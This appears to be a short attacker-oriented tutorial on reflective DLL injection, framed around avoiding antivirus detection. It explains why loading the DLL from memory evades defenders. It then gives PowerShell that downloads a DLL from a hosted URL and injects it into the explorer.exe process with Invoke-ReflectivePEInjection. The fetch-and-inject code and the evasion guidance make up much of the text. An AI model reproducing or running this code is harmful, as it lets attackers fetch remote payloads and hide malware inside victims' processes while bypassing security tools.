Reflective DLL Injection

  • In DLL injection, the DLL is loaded from the disk to the remote process. Writing DLL to the disk can trigger AV and can compromise out attack.

  • A workaround to this problem would be to implement Reflective DLL injection. The DLL is injected to the victim process directly from memory rather than from disk.

  • This basically maps the DLL's Portable Executable format content into the memory.

  • We can use a powershell module to implement the functionality of the LoadLibrary but avoid writing to the disk and also bypass detection by process explorer and AV.

  • For this we can use the Invoke-ReflectPEInjection to parse the contents of the PE file and perform reflection to avoid writing to the disk.

  • This tool has two functionalities: reflectively load PE or EXE to same process or reflective load DLL onto remote process.

Import the powershell module :

Import-Module Invoke-ReflectivePEInjection.ps1

Powershell Code to perform Reflective DLL Injection

$bytes = (New-Object System.Net.WebClient).DownloadData('<Hosted DLL file>')
$procid = (Get-Process -Name explorer).Id

Invoke-ReflectivePEInjection -PEBytes $bytes -ProcId $procid

Documentation :

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